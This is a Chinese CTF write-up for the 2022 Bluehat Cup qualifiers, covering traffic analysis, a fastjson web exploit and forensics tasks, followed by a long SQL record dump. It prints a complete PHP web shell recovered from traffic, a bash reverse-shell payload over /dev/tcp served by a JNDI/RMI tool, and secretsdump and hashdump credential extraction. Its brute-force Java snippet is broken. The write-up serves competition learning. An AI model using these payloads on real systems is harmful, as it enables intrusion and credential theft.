2022 BluehatCup QUALS | Partly Writeup

MISC

domainhacker

提取流量中的压缩包

追踪TCP流，看一下shell

<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr=preg_split("/;|:/",$opdir);
    @array_push($oparr,$ocwd,sys_get_temp_dir());
    foreach($oparr as $item) {
        if(!@is_writable($item)) {
            continue;
        }
        ;
        $tmdir=$item."/.c46a89a";
        @mkdir($tmdir);
        if(!@file_exists($tmdir)) {
            continue;
        }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr=@preg_split("/\\\\|\//",$tmdir);
        for ($i=0;$i<sizeof($cntarr);$i++) {
            @chdir("..");
        }
        ;
        @ini_set("open_basedir","/");
        @rmdir($tmdir);
        break;
    }
    ;
}
;
;
function asenc($out) {
    return $out;
}
;
function asoutput() {
    $output=ob_get_contents();
    ob_end_clean();
    echo "79c2"."0b92";
    echo @asenc($output);
    echo "b4e7e"."465b62";
}
ob_start();
try {
    $p=base64_decode(substr($_POST["yee092cda97a62"],2));
    $s=base64_decode(substr($_POST["q8fb9d4c082c11"],2));
    $envstr=@base64_decode(substr($_POST["p48a6d55fac1b1"],2));

    $d=dirname($_SERVER["SCRIPT_FILENAME"]);
    $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
    if(substr($d,0,1)=="/") {
        @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
    } else {
        @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
    }
    if(!empty($envstr)) {
        $envarr=explode("|||asline|||", $envstr);
        foreach($envarr as $v) {
            if (!empty($v)) {
                @putenv(str_replace("|||askey|||", "=", $v));
            }
        }
    }
    $r="{$p} {$c}";
    function fe($f) {
        $d=explode(",",@ini_get("disable_functions"));
        if(empty($d)) {
            $d=array();
        } else {
            $d=array_map('trim',array_map('strtolower',$d));
        }
        return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
    }
    ;
    function runshellshock($d, $c) {
        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
                $tmp = tempnam(sys_get_temp_dir(), 'as');
                putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
                if (fe('error_log')) {
                    error_log("a", 1);
                } else {
                    mail("a@127.0.0.1", "", "", "-bv");
                }
            } else {
                return False;
            }
            $output = @file_get_contents($tmp);
            @unlink($tmp);
            if ($output != "") {
                print($output);
                return True;
            }
        }
        return False;
    }
    ;
    function runcmd($c) {
        $ret=0;
        $d=dirname($_SERVER["SCRIPT_FILENAME"]);
        if(fe('system')) {
            @system($c,$ret);
        } elseif(fe('passthru')) {
            @passthru($c,$ret);
        } elseif(fe('shell_exec')) {
            print(@shell_exec($c));
        } elseif(fe('exec')) {
            @exec($c,$o,$ret);
            print(join("",$o));
        } elseif(fe('popen')) {
            $fp=@popen($c,'r');
            while(!@feof($fp)) {
                print(@fgets($fp,2048));
            }
            @pclose($fp);
        } elseif(fe('proc_open')) {
            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
            while(!@feof($io[1])) {
                print(@fgets($io[1],2048));
            }
            while(!@feof($io[2])) {
                print(@fgets($io[2],2048));
            }
            @fclose($io[1]);
            @fclose($io[2]);
            @proc_close($p);
        } elseif(fe('antsystem')) {
            @antsystem($c);
        } elseif(runshellshock($d, $c)) {
            return $ret;
        } elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
            $w=new COM('WScript.shell');
            $e=$w->exec($c);
            $so=$e->StdOut();
            $ret.=$so->ReadAll();
            $se=$e->StdErr();
            $ret.=$se->ReadAll();
            print($ret);
        } else {
            $ret = 127;
        }
        return $ret;
    }
    ;
    $ret=@runcmd($r." 2>&1");
    print ($ret!=0)?"ret={$ret}":"";
    ;
}
catch(Exception $e) {
    echo "ERROR://".$e->getMessage();
}
;
asoutput();
die()

在TCP第13流发现压缩包密码，

解压以后发现是mimikatz记录，查看NTLM ，即为flag

flag{416f89c3a5deb1d398a1a1fce93862a7}

domainhacker2

在流量包提取压缩包密码：

解压以后，获得ntds.dit SYSTEM SECURITY文件，放到同一目录下然后用impacket进行解密

 python3 secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL -history

因为题目要求是之前的hash，所以要获取之前的hash值

flag{07ab403ab740c1540c378b0f5aaa4087}

WEB

Ez_gadget

参考链接：红队武器库:fastjson小于1.2.68全漏洞RCE利用exp (zeo.cool)

工具链接：https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.jar

fastjson1.2.62 需要爆破key

脚本：

package baopo;
public class baopo{
    public static void main (String[] args){
        for (int i = 0;i < 999999999;i++){
            int key = String.valueOf(i).hashCode() ==key){
                System.out.pintln(i)
            }
        }
    }
}

在自己服务器上启动服务

java -cp fastjson_tool.jar fastjson.HRMIServer x.x.x.x 8888 "bash=bash -i >&/dev/tcp/x.x.x.x/6666 0>&1"

但是黑名单过滤了\x，只需要unicode编码就可以绕过。要把rmi用unicode编码

flag{e513e5cc-b3ba-4451-8027-6f213b4ffedf}

取证

手机取证_1

直接查找文件名，

导出查看：

360x360

手机取证_2

搜索关键字姜，在Skype中的群组有聊天记录：

计算机取证_1

PS D:\volatility_2.6_win64_standalone> ./volatility_2.6_win64_standalone.exe -f F:\2022bluecat\1.dmp --profile=Win7SP1x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
taqi7:1000:aad3b435b51404eeaad3b435b51404ee:7f21caca5685f10d9e849cc84c340528:::
naizheng:1002:aad3b435b51404eeaad3b435b51404ee:d123b09e13b1a82277c3e3f0ca722060:::
qinai:1003:aad3b435b51404eeaad3b435b51404ee:1c333843181864a58156f3e9498fe905:::

anxinqi

计算机取证_2

利用取证大师工具集获取内存文件信息

2192

计算机分析_3

利用取证大师工具集获取bitlocker密钥文件

导出后对镜像进行解密，

有两个Office文件，两个文档，其中pass.txt是密码集

先对word文档进行解密，可以采用手撕的方式，word文档密码是：688561

没有其他信息，

看powerpoint文档，手撕密码：287fuweiuhfiute

计算机取证_4

加密文档采用了True_crypt加密，尝试利用取证大师工具集获取密钥文件进行解密，结果失败。

导出文件，Passware kit制作镜像

用取证大师加载新生成的文件

爆破压缩包密码：

得到flag

程序分析_1

程序分析_2

程序分析_3

解密发现确实是服务器地址

程序分析_4

package d.a.a.c.a

进行跟踪

答案是a

网站取证_1

网站源码过一遍D盾就有

lanmaobei666

网站取证_2

数据库配置文件在

application\database.php

去encrypt/encrypt.php查看一下，然后想办法输出出来：

<?php
$str = 'P3LMJ4uCbkFJ/RarywrCvA==';
$str = str_replace(array("/r/n", "/r", "/n"), "", $str);
$key = 'PanGuShi';
$iv = substr(sha1($key),0,16);
$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
mcrypt_generic_init($td, "PanGuShi", $iv);
$decode = base64_decode($str);
$dencrypted = mdecrypt_generic($td, $decode);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
$dencrypted = trim($dencrypted);
echo $dencrypted;

遇到报错Call to undefined function: mcrypt_module_open()的话是PHP版本过高缺少一个dll文件，下载到php扩展目录下然后修改php.ini即可

网站取证_3

在application\admin\controller目录下Channelorder.php就有

网站取证_4

对比bak.sql发现数据：

张宝：3

王子豪： 5

前面是收款人，后面是付款人，所以顺序就是5, 3

对4月2日至4月18日之中，符合付款顺序的记录进行提取

INSERT INTO "public"."tab_channel_order_list" VALUES (142, '943617668819', 'GG币', NULL, '2022-04-02 01:16:26', 5, 3, 'mZVymm9t');
INSERT INTO "public"."tab_channel_order_list" VALUES (144, '588047503620', 'GG币', NULL, '2022-04-02 01:47:16', 5, 3, 'lpxqlXFo');
INSERT INTO "public"."tab_channel_order_list" VALUES (150, '597613045539', 'GG币', NULL, '2022-04-02 02:32:02', 5, 3, 'l5xummto');
INSERT INTO "public"."tab_channel_order_list" VALUES (167, '368360644631', 'GG币', NULL, '2022-04-02 03:46:25', 5, 3, 'm5Zwm3Bn');
INSERT INTO "public"."tab_channel_order_list" VALUES (187, '704008760599', 'GG币', NULL, '2022-04-02 06:53:30', 5, 3, 'nJhtlGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (189, '695829830065', 'GG币', NULL, '2022-04-02 06:57:22', 5, 3, 'm5tpmGtm');
INSERT INTO "public"."tab_channel_order_list" VALUES (197, '689591506416', 'GG币', NULL, '2022-04-02 08:09:16', 5, 3, 'm5ptnGtu');
INSERT INTO "public"."tab_channel_order_list" VALUES (199, '296524099918', 'GG币', NULL, '2022-04-02 08:29:29', 5, 3, 'mZlym25r');
INSERT INTO "public"."tab_channel_order_list" VALUES (209, '202884729901', 'GG币', NULL, '2022-04-02 09:39:39', 5, 3, 'm5hpnHBu');
INSERT INTO "public"."tab_channel_order_list" VALUES (210, '955226714946', 'GG币', NULL, '2022-04-02 09:47:09', 5, 3, 'm5prlm9u');
INSERT INTO "public"."tab_channel_order_list" VALUES (227, '421623628935', 'GG币', NULL, '2022-04-02 12:33:01', 5, 3, 'nJlyl2hu');
INSERT INTO "public"."tab_channel_order_list" VALUES (245, '228102248133', 'GG币', NULL, '2022-04-02 15:05:53', 5, 3, 'lptummhs');
INSERT INTO "public"."tab_channel_order_list" VALUES (263, '279069782487', 'GG币', NULL, '2022-04-02 17:33:06', 5, 3, 'lpxrl21n');
INSERT INTO "public"."tab_channel_order_list" VALUES (317, '911539892864', 'GG币', NULL, '2022-04-03 00:44:48', 5, 3, 'mZRpnHBs');
INSERT INTO "public"."tab_channel_order_list" VALUES (358, '940690024660', 'GG币', NULL, '2022-04-03 06:12:18', 5, 3, 'mZpxm2lr');
INSERT INTO "public"."tab_channel_order_list" VALUES (371, '703759626723', 'GG币', NULL, '2022-04-03 08:02:01', 5, 3, 'm5dtmGls');
INSERT INTO "public"."tab_channel_order_list" VALUES (405, '250826052511', 'GG币', NULL, '2022-04-03 11:58:42', 5, 3, 'mpxvlnBv');
INSERT INTO "public"."tab_channel_order_list" VALUES (418, '699369204729', 'GG币', NULL, '2022-04-03 13:26:10', 5, 3, 'mJpynHBt');
INSERT INTO "public"."tab_channel_order_list" VALUES (441, '110783516494', 'GG币', NULL, '2022-04-03 17:08:54', 5, 3, 'nJZwm2lu');
INSERT INTO "public"."tab_channel_order_list" VALUES (448, '754012259548', 'GG币', NULL, '2022-04-03 17:41:43', 5, 3, 'mpdtnWxq');
INSERT INTO "public"."tab_channel_order_list" VALUES (452, '999734985528', 'GG币', NULL, '2022-04-03 18:54:29', 5, 3, 'nJdtlmpr');
INSERT INTO "public"."tab_channel_order_list" VALUES (457, '259291480194', 'GG币', NULL, '2022-04-03 20:24:01', 5, 3, 'mZtymHBm');
INSERT INTO "public"."tab_channel_order_list" VALUES (468, '672136643928', 'GG币', NULL, '2022-04-03 22:11:12', 5, 3, 'nJlslmpp');
INSERT INTO "public"."tab_channel_order_list" VALUES (486, '995091488940', 'GG币', NULL, '2022-04-04 00:49:53', 5, 3, 'l5RunW1p');
INSERT INTO "public"."tab_channel_order_list" VALUES (493, '369911062367', 'GG币', NULL, '2022-04-04 02:05:32', 5, 3, 'nJxplXFm');
INSERT INTO "public"."tab_channel_order_list" VALUES (494, '627743356329', 'GG币', NULL, '2022-04-04 02:14:49', 5, 3, 'lZdpmm1s');
INSERT INTO "public"."tab_channel_order_list" VALUES (496, '341907225040', 'GG币', NULL, '2022-04-04 02:21:29', 5, 3, 'mZZwnW9u');
INSERT INTO "public"."tab_channel_order_list" VALUES (541, '505274522158', 'GG币', NULL, '2022-04-04 09:38:59', 5, 3, 'mJVrmmhp');
INSERT INTO "public"."tab_channel_order_list" VALUES (558, '465727738353', 'GG币', NULL, '2022-04-04 11:36:57', 5, 3, 'lZZwl3Bs');
INSERT INTO "public"."tab_channel_order_list" VALUES (575, '801973338928', 'GG币', NULL, '2022-04-04 13:50:29', 5, 3, 'm5xvm2hm');
INSERT INTO "public"."tab_channel_order_list" VALUES (588, '990446771976', 'GG币', NULL, '2022-04-04 15:55:49', 5, 3, 'mpZslmpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (595, '443752577679', 'GG币', NULL, '2022-04-04 17:12:14', 5, 3, 'mZtrnGtp');
INSERT INTO "public"."tab_channel_order_list" VALUES (598, '274195438646', 'GG币', NULL, '2022-04-04 17:52:24', 5, 3, 'lp1rm21t');
INSERT INTO "public"."tab_channel_order_list" VALUES (605, '389442476686', 'GG币', NULL, '2022-04-04 18:47:30', 5, 3, 'nJxplmtp');
INSERT INTO "public"."tab_channel_order_list" VALUES (651, '840764463035', 'GG币', NULL, '2022-04-05 01:50:13', 5, 3, 'l5twlXFq');
INSERT INTO "public"."tab_channel_order_list" VALUES (667, '575571956339', 'GG币', NULL, '2022-04-05 04:36:41', 5, 3, 'lphqmm9s');
INSERT INTO "public"."tab_channel_order_list" VALUES (693, '369199269150', 'GG币', NULL, '2022-04-05 07:36:54', 5, 3, 'm51wmG1q');
INSERT INTO "public"."tab_channel_order_list" VALUES (706, '299510640482', 'GG币', NULL, '2022-04-05 09:39:18', 5, 3, 'mJlxlWto');
INSERT INTO "public"."tab_channel_order_list" VALUES (731, '660695028585', 'GG币', NULL, '2022-04-05 13:44:39', 5, 3, 'lJ1vmXFq');
INSERT INTO "public"."tab_channel_order_list" VALUES (738, '856482910335', 'GG币', NULL, '2022-04-05 14:17:50', 5, 3, 'mpVpmW5r');
INSERT INTO "public"."tab_channel_order_list" VALUES (756, '750042176098', 'GG币', NULL, '2022-04-05 17:02:30', 5, 3, 'm5lrlGpr');
INSERT INTO "public"."tab_channel_order_list" VALUES (784, '651691106346', 'GG币', NULL, '2022-04-05 23:00:37', 5, 3, 'mpxplm9u');
INSERT INTO "public"."tab_channel_order_list" VALUES (786, '255787712926', 'GG币', NULL, '2022-04-05 23:14:45', 5, 3, 'lZpxnHFn');
INSERT INTO "public"."tab_channel_order_list" VALUES (791, '135691319557', 'GG币', NULL, '2022-04-06 00:05:58', 5, 3, 'nJdymWpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (819, '788431214978', 'GG币', NULL, '2022-04-06 04:11:14', 5, 3, 'mJpum3Fo');
INSERT INTO "public"."tab_channel_order_list" VALUES (850, '851409238798', 'GG币', NULL, '2022-04-06 09:01:35', 5, 3, 'lpRrmWto');
INSERT INTO "public"."tab_channel_order_list" VALUES (873, '260951952586', 'GG币', NULL, '2022-04-06 12:48:13', 5, 3, 'lZtunXBv');
INSERT INTO "public"."tab_channel_order_list" VALUES (885, '231265027253', 'GG币', NULL, '2022-04-06 15:07:16', 5, 3, 'lpprnWtt');
INSERT INTO "public"."tab_channel_order_list" VALUES (930, '262701249039', 'GG币', NULL, '2022-04-06 21:47:06', 5, 3, 'lJdslnBr');
INSERT INTO "public"."tab_channel_order_list" VALUES (977, '184134048308', 'GG币', NULL, '2022-04-07 04:24:51', 5, 3, 'lJZrnWpm');
INSERT INTO "public"."tab_channel_order_list" VALUES (979, '391202213852', 'GG币', NULL, '2022-04-07 04:29:53', 5, 3, 'l5Zrm21m');
INSERT INTO "public"."tab_channel_order_list" VALUES (1004, '325182412061', 'GG币', NULL, '2022-04-07 08:23:24', 5, 3, 'lJdul2hm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1009, '145997703051', 'GG币', NULL, '2022-04-07 08:52:54', 5, 3, 'mphylG9q');
INSERT INTO "public"."tab_channel_order_list" VALUES (1029, '812286624781', 'GG币', NULL, '2022-04-07 11:25:32', 5, 3, 'lZhpm2pp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1051, '932860292032', 'GG币', NULL, '2022-04-07 15:30:43', 5, 3, 'lZ1qnW1s');
INSERT INTO "public"."tab_channel_order_list" VALUES (1074, '960800718320', 'GG币', NULL, '2022-04-07 18:13:02', 5, 3, 'nJ1tlHFp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1079, '309703180719', 'GG币', NULL, '2022-04-07 18:34:31', 5, 3, 'mZxqm2tp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1080, '867260227199', 'GG币', NULL, '2022-04-07 18:43:45', 5, 3, 'mZdsm21t');
INSERT INTO "public"."tab_channel_order_list" VALUES (1088, '489129121639', 'GG币', NULL, '2022-04-07 20:38:54', 5, 3, 'mpRvlG9o');
INSERT INTO "public"."tab_channel_order_list" VALUES (1094, '640176750934', 'GG币', NULL, '2022-04-07 21:18:54', 5, 3, 'mJVqlmhv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1097, '271657786070', 'GG币', NULL, '2022-04-07 21:39:16', 5, 3, 'mJRwlHBq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1119, '895632760061', 'GG币', NULL, '2022-04-08 00:14:36', 5, 3, 'l5dtmWtt');
INSERT INTO "public"."tab_channel_order_list" VALUES (1164, '291179495316', 'GG币', NULL, '2022-04-08 07:31:35', 5, 3, 'mZdylHFt');
INSERT INTO "public"."tab_channel_order_list" VALUES (1170, '588053366224', 'GG币', NULL, '2022-04-08 07:44:05', 5, 3, 'l5RqlWxn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1171, '308892834659', 'GG币', NULL, '2022-04-08 07:50:45', 5, 3, 'mZ1um3Fs');
INSERT INTO "public"."tab_channel_order_list" VALUES (1181, '712419993689', 'GG币', NULL, '2022-04-08 08:43:06', 5, 3, 'lJ1rnWhu');
INSERT INTO "public"."tab_channel_order_list" VALUES (1185, '240497645432', 'GG币', NULL, '2022-04-08 09:19:05', 5, 3, 'm5pulWhv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1193, '519564426335', 'GG币', NULL, '2022-04-08 09:57:45', 5, 3, 'lptrnW1u');
INSERT INTO "public"."tab_channel_order_list" VALUES (1218, '178274213935', 'GG币', NULL, '2022-04-08 13:23:04', 5, 3, 'm5xynWxn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1243, '621845480580', 'GG币', NULL, '2022-04-08 16:30:05', 5, 3, 'lpRynGtr');
INSERT INTO "public"."tab_channel_order_list" VALUES (1246, '984927062919', 'GG币', NULL, '2022-04-08 17:09:06', 5, 3, 'mpxulGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1255, '508590678286', 'GG币', NULL, '2022-04-08 18:22:27', 5, 3, 'nJdslm9r');
INSERT INTO "public"."tab_channel_order_list" VALUES (1261, '165679472688', 'GG币', NULL, '2022-04-08 19:09:09', 5, 3, 'lJhslHBq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1272, '398566701812', 'GG币', NULL, '2022-04-08 22:03:28', 5, 3, 'nJpwnWhu');
INSERT INTO "public"."tab_channel_order_list" VALUES (1299, '391669188513', 'GG币', NULL, '2022-04-09 01:22:34', 5, 3, 'mptql2tv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1328, '308977433705', 'GG币', NULL, '2022-04-09 06:27:14', 5, 3, 'l51xmmlp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1347, '128173141307', 'GG币', NULL, '2022-04-09 08:52:54', 5, 3, 'mZVymXFn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1375, '315017222711', 'GG币', NULL, '2022-04-09 14:06:48', 5, 3, 'lJhqnW5q');
INSERT INTO "public"."tab_channel_order_list" VALUES (1390, '698730100843', 'GG币', NULL, '2022-04-09 16:15:03', 5, 3, 'm5ppmGpr');
INSERT INTO "public"."tab_channel_order_list" VALUES (1394, '454661923665', 'GG币', NULL, '2022-04-09 16:45:28', 5, 3, 'mZlqm21t');
INSERT INTO "public"."tab_channel_order_list" VALUES (1446, '770844458971', 'GG币', NULL, '2022-04-09 23:54:25', 5, 3, 'mpZslWxt');
INSERT INTO "public"."tab_channel_order_list" VALUES (1461, '336049994728', 'GG币', NULL, '2022-04-10 01:28:10', 5, 3, 'mJ1pnHFm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1503, '900217499326', 'GG币', NULL, '2022-04-10 08:16:00', 5, 3, 'l5drlXBp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1515, '541334504409', 'GG币', NULL, '2022-04-10 10:10:06', 5, 3, 'mJlvmW1u');
INSERT INTO "public"."tab_channel_order_list" VALUES (1520, '296235199037', 'GG币', NULL, '2022-04-10 11:06:19', 5, 3, 'mZtxlG5t');
INSERT INTO "public"."tab_channel_order_list" VALUES (1522, '961454505603', 'GG币', NULL, '2022-04-10 11:21:05', 5, 3, 'nJtsnHFn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1540, '660586887840', 'GG币', NULL, '2022-04-10 12:58:19', 5, 3, 'l5Rvm29o');
INSERT INTO "public"."tab_channel_order_list" VALUES (1542, '521373859771', 'GG币', NULL, '2022-04-10 13:02:35', 5, 3, 'm5xvlWxv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1558, '690490467926', 'GG币', NULL, '2022-04-10 15:05:50', 5, 3, 'm5Zrl2xm');
INSERT INTO "public"."tab_channel_order_list" VALUES (1615, '915839175755', 'GG币', NULL, '2022-04-11 01:02:35', 5, 3, 'mZlwlG1u');
INSERT INTO "public"."tab_channel_order_list" VALUES (1667, '731272590033', 'GG币', NULL, '2022-04-11 08:17:29', 5, 3, 'nJpvlWtr');
INSERT INTO "public"."tab_channel_order_list" VALUES (1676, '266051494236', 'GG币', NULL, '2022-04-11 08:51:14', 5, 3, 'mJxym25s');
INSERT INTO "public"."tab_channel_order_list" VALUES (1677, '952748053664', 'GG币', NULL, '2022-04-11 08:51:59', 5, 3, 'lpVqnWxv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1721, '432188794976', 'GG币', NULL, '2022-04-11 14:00:17', 5, 3, 'mZVvl3Fq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1730, '923396563975', 'GG币', NULL, '2022-04-11 16:47:41', 5, 3, 'lZVtlW5m');
INSERT INTO "public"."tab_channel_order_list" VALUES (1731, '188214551206', 'GG币', NULL, '2022-04-11 16:48:30', 5, 3, 'lZRqlGhn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1737, '562343715793', 'GG币', NULL, '2022-04-11 17:44:21', 5, 3, 'nJxqm2hn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1788, '723775062575', 'GG币', NULL, '2022-04-11 23:59:53', 5, 3, 'nJVtl21s');
INSERT INTO "public"."tab_channel_order_list" VALUES (1814, '437640662866', 'GG币', NULL, '2022-04-12 04:52:14', 5, 3, 'lJdumWlq');
INSERT INTO "public"."tab_channel_order_list" VALUES (1847, '261181748262', 'GG币', NULL, '2022-04-12 08:07:42', 5, 3, 'mJtxmGtp');
INSERT INTO "public"."tab_channel_order_list" VALUES (1866, '520680592708', 'GG币', NULL, '2022-04-12 10:10:57', 5, 3, 'mZxsnHFv');
INSERT INTO "public"."tab_channel_order_list" VALUES (1893, '846224640296', 'GG币', NULL, '2022-04-12 13:45:48', 5, 3, 'lpdtl2xn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1901, '526823225486', 'GG币', NULL, '2022-04-12 14:27:33', 5, 3, 'mphqlm5p');
INSERT INTO "public"."tab_channel_order_list" VALUES (1919, '293881600039', 'GG币', NULL, '2022-04-12 17:33:24', 5, 3, 'lJdxlGpn');
INSERT INTO "public"."tab_channel_order_list" VALUES (1986, '252943398463', 'GG币', NULL, '2022-04-13 02:42:54', 5, 3, 'lpVvlHFu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2050, '841971039165', 'GG币', NULL, '2022-04-13 10:41:00', 5, 3, 'lJhvmHBn');
INSERT INTO "public"."tab_channel_order_list" VALUES (2051, '113568559627', 'GG币', NULL, '2022-04-13 10:46:38', 5, 3, 'l5xunGtv');
INSERT INTO "public"."tab_channel_order_list" VALUES (2059, '884517377766', 'GG币', NULL, '2022-04-13 12:12:35', 5, 3, 'lZRul2pt');
INSERT INTO "public"."tab_channel_order_list" VALUES (2065, '429478659168', 'GG币', NULL, '2022-04-13 12:47:08', 5, 3, 'mpdqnGxu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2081, '701817809209', 'GG币', NULL, '2022-04-13 15:06:14', 5, 3, 'l5Zxlmho');
INSERT INTO "public"."tab_channel_order_list" VALUES (2093, '648527268061', 'GG币', NULL, '2022-04-13 17:34:17', 5, 3, 'lJppmWhq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2118, '346397347560', 'GG币', NULL, '2022-04-13 21:20:16', 5, 3, 'nJVylWpp');
INSERT INTO "public"."tab_channel_order_list" VALUES (2121, '598070757264', 'GG币', NULL, '2022-04-13 21:49:38', 5, 3, 'm5VxnWlr');
INSERT INTO "public"."tab_channel_order_list" VALUES (2144, '385475471817', 'GG币', NULL, '2022-04-14 00:45:19', 5, 3, 'lpdsnGtq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2152, '860407002245', 'GG币', NULL, '2022-04-14 02:02:07', 5, 3, 'mZ1tnGpt');
INSERT INTO "public"."tab_channel_order_list" VALUES (2175, '876730476520', 'GG币', NULL, '2022-04-14 07:03:09', 5, 3, 'mJVqmmtq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2226, '705271590445', 'GG币', NULL, '2022-04-14 12:55:39', 5, 3, 'l5hslWhm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2260, '778005846695', 'GG币', NULL, '2022-04-14 17:39:20', 5, 3, 'lZZtl21r');
INSERT INTO "public"."tab_channel_order_list" VALUES (2265, '429472355879', 'GG币', NULL, '2022-04-14 19:00:35', 5, 3, 'nJlumGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2279, '837352974915', 'GG币', NULL, '2022-04-14 21:44:54', 5, 3, 'lJhsmW9t');
INSERT INTO "public"."tab_channel_order_list" VALUES (2304, '206040245526', 'GG币', NULL, '2022-04-15 01:40:08', 5, 3, 'lZZym25s');
INSERT INTO "public"."tab_channel_order_list" VALUES (2347, '214154454225', 'GG币', NULL, '2022-04-15 08:01:16', 5, 3, 'l5tpnHBt');
INSERT INTO "public"."tab_channel_order_list" VALUES (2353, '539433927736', 'GG币', NULL, '2022-04-15 09:22:24', 5, 3, 'nJVunG1q');
INSERT INTO "public"."tab_channel_order_list" VALUES (2371, '614328206854', 'GG币', NULL, '2022-04-15 12:43:40', 5, 3, 'mJdtlHFu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2373, '744073817220', 'GG币', NULL, '2022-04-15 12:59:32', 5, 3, 'mpVtlnFp');
INSERT INTO "public"."tab_channel_order_list" VALUES (2386, '472576318606', 'GG币', NULL, '2022-04-15 15:44:12', 5, 3, 'mplrnG1t');
INSERT INTO "public"."tab_channel_order_list" VALUES (2393, '905356397967', 'GG币', NULL, '2022-04-15 16:21:55', 5, 3, 'mJ1ylHBr');
INSERT INTO "public"."tab_channel_order_list" VALUES (2408, '202047690664', 'GG币', NULL, '2022-04-15 18:52:56', 5, 3, 'nJhynG5m');
INSERT INTO "public"."tab_channel_order_list" VALUES (2419, '660557237414', 'GG币', NULL, '2022-04-15 20:02:34', 5, 3, 'mplymG1r');
INSERT INTO "public"."tab_channel_order_list" VALUES (2518, '284536429033', 'GG币', NULL, '2022-04-16 09:06:00', 5, 3, 'lJtxlGxo');
INSERT INTO "public"."tab_channel_order_list" VALUES (2537, '846259865921', 'GG币', NULL, '2022-04-16 13:46:20', 5, 3, 'lpRxnGlm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2539, '914271862202', 'GG币', NULL, '2022-04-16 13:54:39', 5, 3, 'mZxwnG5s');
INSERT INTO "public"."tab_channel_order_list" VALUES (2569, '230868458507', 'GG币', NULL, '2022-04-16 18:43:11', 5, 3, 'mZptnWpn');
INSERT INTO "public"."tab_channel_order_list" VALUES (2592, '580327294210', 'GG币', NULL, '2022-04-16 22:20:02', 5, 3, 'mJZylGxq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2601, '113725129935', 'GG币', NULL, '2022-04-16 23:57:42', 5, 3, 'mZZvm3Fo');
INSERT INTO "public"."tab_channel_order_list" VALUES (2614, '125295831828', 'GG币', NULL, '2022-04-17 01:33:33', 5, 3, 'lJdxnW9t');
INSERT INTO "public"."tab_channel_order_list" VALUES (2622, '304246628524', 'GG币', NULL, '2022-04-17 02:02:29', 5, 3, 'lZtxmXFv');
INSERT INTO "public"."tab_channel_order_list" VALUES (2636, '949878301272', 'GG币', NULL, '2022-04-17 04:33:37', 5, 3, 'nJxtlXFm');
INSERT INTO "public"."tab_channel_order_list" VALUES (2642, '236806705755', 'GG币', NULL, '2022-04-17 05:17:45', 5, 3, 'mJZumW1r');
INSERT INTO "public"."tab_channel_order_list" VALUES (2644, '219250916132', 'GG币', NULL, '2022-04-17 05:36:23', 5, 3, 'nJ1tmG1p');
INSERT INTO "public"."tab_channel_order_list" VALUES (2653, '856797267940', 'GG币', NULL, '2022-04-17 06:50:17', 5, 3, 'mplslmpu');
INSERT INTO "public"."tab_channel_order_list" VALUES (2709, '829562956572', 'GG币', NULL, '2022-04-17 12:14:25', 5, 3, 'lJZxlG5p');
INSERT INTO "public"."tab_channel_order_list" VALUES (2751, '904086289177', 'GG币', NULL, '2022-04-17 18:58:49', 5, 3, 'nJtxmXBq');
INSERT INTO "public"."tab_channel_order_list" VALUES (2796, '568416612736', 'GG币', NULL, '2022-04-18 00:23:41', 5, 3, 'lZdxmmtq');
